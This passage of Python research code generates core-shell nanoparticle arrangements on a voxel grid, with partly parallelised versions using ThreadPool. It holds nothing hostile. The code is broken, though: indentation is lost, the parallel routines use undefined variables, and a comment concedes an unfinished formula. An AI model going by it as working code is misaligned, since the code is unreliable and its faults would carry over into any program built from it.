yy9= ((2+sqrt(3.0))*float(radiusc/dl)-j+1)
zz9=((2+sqrt(3.0))*float(radiusc/dl)-k+1)
xx10=((2+sqrt(3.0))*float(radiusc/dl)-i+1)
yy10= ((2+sqrt(3.0))*float(radiusc/dl)-j+1)
zz10=((2+sqrt(3.0))*float(radiusc/dl)-k+1)
xx11=((1.0+sqrt(2.0))*float(radiusc/dl)-i+1)
yy11= ((2.0+sqrt(3.0))*float(radiusc/dl)-j+1)
zz11=((1.0+sqrt(2.0))*float(radiusc/dl)-k+1)
xx12=((2.0+sqrt(3.0))*float(radiusc/dl)-i+1)
yy12= ((1.0+sqrt(2.0))*float(radiusc/dl)-j+1)
zz12=((1.0+sqrt(2.0))*float(radiusc/dl)-k+1)
xx13=((1.0+sqrt(2.0))*float(radiusc/dl)-i+1)
yy13= ((1.0+sqrt(2.0))*float(radiusc/dl)-j+1)
zz13=((2.0+sqrt(3.0))*float(radiusc/dl)-k+1)
xx14=(1*float(radiusc/dl)-i+1)
yy14= ((1.0+sqrt(2.0))*float(radiusc/dl)-j+1)
zz14=((1.0+sqrt(2.0))*float(radiusc/dl)-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
ii=ii+1
return A
###########################################################################################################################
def para_rec(j,k,xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
# print(radiuscore, radiusc, "dimensions")
# print(j,"j")
iii=0
jjj=0
ind=0
listind=[]
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for h in range(zini,Ntam+1):
for g in range(zini,Npiy+1):
# w_queue= Queue()
# w_queue= Queue()
for w in range(zini,Npix+1):
# print a,b
# xx1=(basalradius/dl-i+1)
# yy1= (basalradius/dl-j+1)
# zz1=(perpradius/dl-k+1)
x[ii]= float(((float(radiusc*(2*(w-1)+1))/float(dl)-float(i)+2.0)))
y[ii]= float(((float(radiusc*(2*(g-1)+1))/float(dl)-float(j))+2.0))
z[ii]= float(((float(radiusc*(2*(h-1)+1))/float(dl)-float(k)+2.0)))
# print(x[ii],ii,len(x))
# print(i,j,k, "i,j,k")
# print(w,g,h,"w,g,h")
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
# A[i][j+(k-1)*Dy1] = index
iii=i
jjj=j+(k-1)*Dy1
# if(index==2):
# print("indice igual a 1")
ind=index
listind.append([iii,jjj,ind])
# print(ind, "eh o indice")
# print(index)
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
# A is not visible inside this worker; collect the result like the sphere branch does
listind.append([i,j+(k-1)*Dy1,index])
if (shape=='octahedron'):
[index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
listind.append([i,j+(k-1)*Dy1,index])
if (shape=='triplate'):
[index,aa] = incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs)
if (aa==1):
listind.append([i,j+(k-1)*Dy1,index])
ii=ii+1
# return A
# if(ind==1):
# print(ind)
# print(listind)
# return iii,jjj,ind
return listind
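# Note (added): para_rec returns a list of [i, j+(k-1)*Dy1, index] triples
# instead of writing into A directly, because it runs inside ThreadPool
# workers; rectangular() below waits on every async result and merges the
# triples back into the shared matrix A.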
###########################################################################################################################
# function or class that describes which geometry will be chosen.
# for now this will be done with functions
def rectangular (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
############################################################################################################################
## TRYING TO PARALLELIZE THIS PART!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
############################################################################################################################
# nThreads = 4
# pool = ThreadPool(processes=nThreads)
num_cores = multiprocessing.cpu_count()
# print(num_cores, "cores")
# w=0
# g=0
# print(corenumber,'aqui')
# print(1)
for k in range(zini,zfin+1):
# print(zini, zfin+1, "zs")
# for j in range(yini,yfin+1):
# inputs = range(yini,yfin+1)
# parts= partial(para_rec,k=k,xini=xini,xfin=xfin,yini=yini,yfin=yfin,zini=zini,zfin=zfin,Npix=Npix,Npiy=Npiy,Ntam=Ntam,Dx1=Dx1,Dy1=Dy1,Dz1=Dz1,radiusc=radiusc,radiuscore=radiuscore,radiusshell=radiusshell,A=A,corenumber=corenumber,shellnumber=shellnumber,cnum=cnum,dl=dl,x=x,y=y,z=z,shape=shape,base=base,width=width,height=height,base2=base2,width2=width2,radiusx1=radiusx1,radiusy1=radiusy1,radiusz1=radiusz1,radiusx2=radiusx2,radiusy2=radiusy2,radiusz2=radiusz2,radiusxcs=radiusxcs,radiusycs=radiusycs,radiuszcs=radiuszcs,cs=cs)
nThreads = 2*num_cores
pool = ThreadPool(processes=nThreads)
threadsrange=int((yfin+1)/nThreads)
# print(threadsrange)
proc = []
for kkk in range(nThreads):
for j in range(kkk*threadsrange,(kkk+1)*threadsrange):
# print(j,"eh o j")
proc.append(pool.apply_async(para_rec, (j,k,xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)))
# print(len(proc), "length of proc")
for j in range(len(proc)):
proc[j].wait()
out = []
for j in range(len(proc)):
out.append(proc[j].get())
# print(len(out))
# print()
# print(len(out), "comp1",len(out[0]), "comp2")
# w=out[0]
# print(w[0])
# print(len(out),"length of out")
# print(len(w),"length of w")
for j in range(len(out)):
ww=out[j]
# print(w)
if(ww!=[]):
# print(w)
for o in range(len(ww)):
vv=ww[o]
# vv is one [i, j+(k-1)*Dy1, index] triple; write it into A once
A[vv[0]][vv[1]]=vv[2]
# xxxx=1
# print(len(w))
# print(len(out))
# print (w[2])
# for o in range(len(w)):
# if(w[2]!=0):
# A[w[0]][w[1]]=w[2]
# if (w[2]==1):
# print("w[2] igual a 1",w[0],w[1])
# A = Parallel(n_jobs=num_cores)(delayed(parts)(j) for j in inputs)
# para_rec (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
# print(A[21][14],"esse")
return A
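# Sketch (added, hypothetical and self-contained) of the fan-out/fan-in
# pattern used above, with a trivial worker in place of para_rec:
#
#   from multiprocessing.pool import ThreadPool
#   pool = ThreadPool(processes=4)
#   jobs = [pool.apply_async(lambda row: [[row, row, 1]], (j,)) for j in range(8)]
#   triples = [t for job in jobs for t in job.get()]   # .get() blocks until the job is done
#   # each [i, col, index] triple is then written into the target matrix,
#   # exactly as the loop over `out` does above.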
###########################################################################################################################
###########################################################################################################################
# function or class that describes which geometry will be chosen.
# for now this will be done with functions
def columnpiling (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
w=0
g=0
# print(corenumber,'aqui')
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for h in range(zini,Ntam+1):
# print a,b
# xx1=(basalradius/dl-i+1)
# yy1= (basalradius/dl-j+1)
# zz1=(perpradius/dl-k+1)
x[ii]= float(((float(radiusc)/float(dl)-float(i)+2.0)))
y[ii]= float(((float(radiusc)/float(dl)-float(j))+2.0))
z[ii]= float(((float(radiusc*(2*(h-1)+1))/float(dl)-float(k)+2.0)))
# print(x[ii],ii,len(x))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
[index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='triplate'):
[index,aa] = incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
ii=ii+1
return A
###########################################################################################################################
# function or class that describes which geometry will be chosen.
# for now this will be done with functions
def parallelpygen(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,xini,xfin,yini,yfin,zini,zfin,Dx1,Dy1,Dz1):
mult=(Dy1)*(Dz1)  # d_k is not defined in this function; size the buffer like the full matrix
aux= [[0 for i in range(mult+1)] for j in range(Dx1+1)]
#print (Dx1)
# A= [[0 for i in range(mult+1)] for j in range(Dx1+1)]
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
# print a,b
ii=1
for h in range(zini,Ntam+1):
Npiyw=Npiy-(h-1)
w=Npiyw
# print h
while (w > 0):
Npixg=Npix-(h-1)
g=Npixg
while(g>0):
x[ii]= float((((float(2.0*(g-1)+1+(h-1)))*float(radiusc)/float(dl)-float(i)+2.0)))
y[ii]= float((((float(2.0*(w-1)+1+(h-1)))*float(radiusc)/float(dl)-float(j))+2.0))
z[ii]= float((((float(sqrt(3.0)*(h-1)+1))*float(radiusc)/float(dl)-float(k)+2.0)))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
[index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
if (shape=='triplate'):
[index,aa] = incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
if (shape=='interpene'):
[index,aa] = incoreshell_interpenesphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber)
if (aa==1):
aux[i][j+(k-1)*Dy1] = index
# while (g>0):
# incoreshell(Npiy,Npix,w,g,i,j,k,ii,radiusc,radiuscore,radiusshell,A,a,b,corenumber,shellnumber,cnum)
# !!!
# div=float(radiusc/dl)
# x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
# y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
# z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
# !!!
# if(index != 0):
# print(index)
g=g-1
# print ii,A[a][b]
ii=ii+1
# print g
w=w-1
#
return aux
def pygeneral (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber):
proc=[]
n_threads=2
i_thread=range(n_threads)
pool = ThreadPool(processes=n_threads)
print(corenumber,'here')
# print(1)
d_k=int((zfin-zini)/n_threads)  # must be an integer so it can be used in range() below
for i_th in i_thread:
for k in range(zini+i_th*d_k,zini+(+1+i_th)*d_k):
proc.append(pool.apply_async(parallelpygen,(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,xini,xfin,yini,yfin,zini,zfin,Dx1,Dy1,Dz1)))
for i in range(len(proc)):
proc[i].wait()
matrix_out = []
for i in range(len(proc)):
matrix_out.append(proc[i].get())
for i_th in i_thread:
for ll in range(zini+i_th*d_k,zini+(+1+i_th)*d_k):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
# there must be a formula for k!!!!
k= (zini+(+1+i_th)*d_k)*i_th
A[i][j+(k-1)*Dy1]=matrix_out[i_th][i][j+(ll-1)*Dy1]
#print A[a][b],a,b
return A
###########################################################################################################################
###########################################################################################################################
# function or class that describes which geometry will be chosen.
# for now this will be done with functions
# describes a pyramid with an arbitrary hexagonal base
def hexpyramid (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
# print(corenumber,'aqui')
for v in range(1,5):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for h in range (1, Ntam+1):
Npiyw=Npiy
# w=Npiyw/2
Npixg=Npix
# g=Npixg/2
box=0
if (h>1):
# if( h> 1):
Npiyw=(Npiy-(h-1))*2-1
if(Npiyw<=0):
Npiyw=Npiy+2
for w in range (1,int(Npiyw/2+1)):
box=box+1
Npixg=Npixg-1
if( h> 1):
Npixg=2*(Npix-(h-1))
if(Npixg<=0):
Npixg=Npix+2
for g in range(1,int(Npixg/2+1)):
if (v==1):
div=float(radiusc/dl)
x[ii]= float((((float((1+(g-1)*sqrt(3.0)+Npiyw)))*div-i+2)))
y[ii]= float(((float((+1+(g-1)+2*(w-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==2):
div=float(radiusc/dl)
x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiyw)))*div-i+2)))
y[ii]= float(((float((+1+(g-1)+2*(w-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==3 ):
div=float(radiusc/dl)
x[ii]= float((((float((1+(g-1)*sqrt(3.0)+Npiyw)))*div-i+2)))
y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiyw))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==4 ):
div=float(radiusc/dl)
x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiyw)))*div-i+2)))
y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiyw))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
[index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
g=g-1
ii=ii+1
w=w-1
#print A[a][b],a,b
return A
###########################################################################################################################
###########################################################################################################################
# function or class that describes which geometry will be chosen.
# for now this will be done with functions
def hexmono (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
# print(corenumber,'aqui')
for v in range(1,5):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for h in range (1, Ntam+1):
Npiyw=Npiy
# w=Npiyw/2
Npixg=Npix
# g=Npixg/2
box=0
# print (Npiy)
# print (int(Npix/2)+1)
for w in range (1,int(Npiy/2)+1):
box=box+1
Npixg=Npixg-1
for g in range(1,int(Npix/2+1)):
if (v==1):
div=float(radiusc/dl)
# x(ii)= ((((1+(g-1)*Sqrt(3.0)+Npiy))*radiusc/dl-i+2))
# y(ii)= (((+1+(g-1)+2*(w-1))*radiusc/dl-j)+2)
# z(ii)= (((Sqrt(3.0)*(h-1)+1)*radiusc/dl-k+2))
x[ii]= float((((float((1+(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
y[ii]= float(((float((+1+(g-1)+2*(w-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==2):
div=float(radiusc/dl)
# x(ii)= ((((1-(g-1)*Sqrt(3.0)+Npiy))*radiusc/dl-i+2))
# y(ii)= (((+1+(g-1)+2*(w-1))*radiusc/dl-j)+2)
# z(ii)= (((Sqrt(3.0)*(h-1)+1)*radiusc/dl-k+2))
x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
y[ii]= float(((float((+1+(g-1)+2*(w-1)))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==3 ):
div=float(radiusc/dl)
# x(ii)= ((((1+(g-1)*Sqrt(3.0)+Npiy))*radiusc/dl-i+2))
# y(ii)= (((-1+1-(g-1)+2*(w-1)+Npiy)*radiusc/dl-j)+2)
# z(ii)= (((Sqrt(3.0)*(h-1)+1)*radiusc/dl-k+2))
x[ii]= float((((float((1+(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (v==4 ):
div=float(radiusc/dl)
# x(ii)= ((((1-(g-1)*Sqrt(3.0)+Npiy))*radiusc/dl-i+2))
# y(ii)= (((-1+1-(g-1)+2*(w-1)+Npiy)*radiusc/dl-j)+2)
# z(ii)= (((Sqrt(3.0)*(h-1)+1)*radiusc/dl-k+2))
x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
	                 [index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
	                 if (aa==1):
	                   A[i][j+(k-1)*Dy1] = index
# g=g-1
ii=ii+1
# w=w-1
#print A[a][b],a,b
return A
###########################################################################################################################
###########################################################################################################################
# function (or class) that describes which geometry will be chosen.
# for now this is implemented with plain functions
# this one is the geometry with a triangular base
def triangular (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
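# Triangular-based pyramid: each layer h removes one sphere from both in-plane directions
# (Npiyw = Npiy-(h-1), Npixg = Npix-(h-1)), and every sphere centre is classified through
# the incoreshell_* routine selected by `shape`.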
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
